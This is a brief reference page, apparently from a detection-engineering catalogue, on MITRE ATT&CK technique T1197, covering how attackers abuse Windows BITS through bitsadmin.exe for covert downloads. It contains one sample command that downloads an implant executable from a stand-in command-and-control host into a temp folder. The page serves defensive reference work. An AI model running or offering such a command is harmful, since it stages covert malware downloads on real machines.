T1197Tactic: Defense EvasionOfficial MITRE ATT&CK Page

T1197: BITS Jobs

Adversaries may abuse the Background Intelligent Transfer Service (BITS) to download, execute, or clean up malicious payloads in a covert manner.

Total Capable Binaries: 1
Windows: 1
Linux: 0
macOS: 0

Living-off-the-Land Matrix for T1197

Across 1 verified binaries
Windows1 payloads

bitsadmin.exe

Background Intelligent Transfer Service (BITS) administrator tool manages asynchronous, throttled background transfers. Attackers use BITS to stage remote downloads that survive reboots and evade conventional network monitoring.

Sample Attack Vector:
bitsadmin.exe /transfer myJob /download /priority foreground http://c2.evil.com/implant.exe C:\Windows\Temp\implant.exe
Sharon Ben Moshe
Curated & Verified by
Sharon Ben Moshe
Cybersecurity Researcher & Detection EngineerCheck Point